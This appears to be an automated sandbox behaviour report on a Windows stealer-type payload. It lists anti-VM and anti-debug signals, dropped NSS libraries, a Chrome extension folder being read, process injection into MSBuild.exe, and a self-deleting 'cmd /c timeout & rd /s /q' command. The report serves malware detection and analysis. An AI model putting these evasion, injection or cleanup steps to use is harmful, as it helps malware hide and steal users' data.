Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\ProgramData\EHDHIDAEHC.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory allocated: 4E60000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\ProgramData\EHDHIDAEHC.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

API coverage: 9.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\ProgramData\EHDHIDAEHC.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2208	Thread sleep count: 78 > 30			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D1110
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_003D99F0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E5EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003E5EA0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003DC2E0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_003DA2C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E56C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_003E56C0
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003DB390
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E4F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_003E4F80
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003D9D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003D9D40
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E5A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_003E5A70
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003DAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_003DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	6_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040B390

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E53C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_003E53C0

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DFDA0 GetSystemInfo,wsprintfA,

0_2_003DFDA0

Source: C:\ProgramData\EHDHIDAEHC.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr	Binary or memory string: EZCZTtShhMhGfSxfdfH
Source: MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWE
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003220000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000031BE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001323000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware8p

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003ED12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_003ED12F

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003D2000 VirtualProtect 00000000,00000004,00000100,?

0_2_003D2000

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

0_2_003E7A40

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E76E0 mov eax, dword ptr fs:[00000030h]		0_2_003E76E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004176E0 mov eax, dword ptr fs:[00000030h]		6_2_004176E0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003E0420 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,wsprintfA,lstrcatA,GetCurrentHwProfileA,lstrlenA,lstrcatA,

0_2_003E0420

Enables debug privileges

Source: C:\ProgramData\EHDHIDAEHC.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003EECC8 SetUnhandledExceptionFilter,	0_2_003EECC8
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003ED12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003ED12F
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003ECAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003ECAF5
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C2CB66C
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C2CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C2CB1F7
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_6C47AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C47AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041ECC8 SetUnhandledExceptionFilter,	6_2_0041ECC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0041D12F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0041CAF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE142AF SetUnhandledExceptionFilter,	6_2_1FE142AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_1FE12C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1FE12C8E

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, type: SAMPLE
Source: Yara match	File source: Process Memory Space: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EHDHIDAEHC.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 1596, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\ProgramData\EHDHIDAEHC.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003DED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

0_2_003DED80

Injects a PE file into a foreign processes

Source: C:\ProgramData\EHDHIDAEHC.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E1400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,	0_2_003E1400
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: 0_2_003E12F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	0_2_003E12F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	6_2_00411400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	6_2_004112F0

Writes to foreign memory regions

Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63D000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D06008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\ProgramData\EHDHIDAEHC.exe "C:\ProgramData\EHDHIDAEHC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFCAAEHJDBKJ" & exit	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\ProgramData\EHDHIDAEHC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe

Code function: 0_2_003D1000 cpuid

0_2_003D1000

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	0_2_003DFC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	6_2_0040FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_20002CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_20002D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_20002DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_20003300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	6_2_1FE12112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,	6_2_1FE12112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_1FE13AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesW,	6_2_1FFEFF17

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

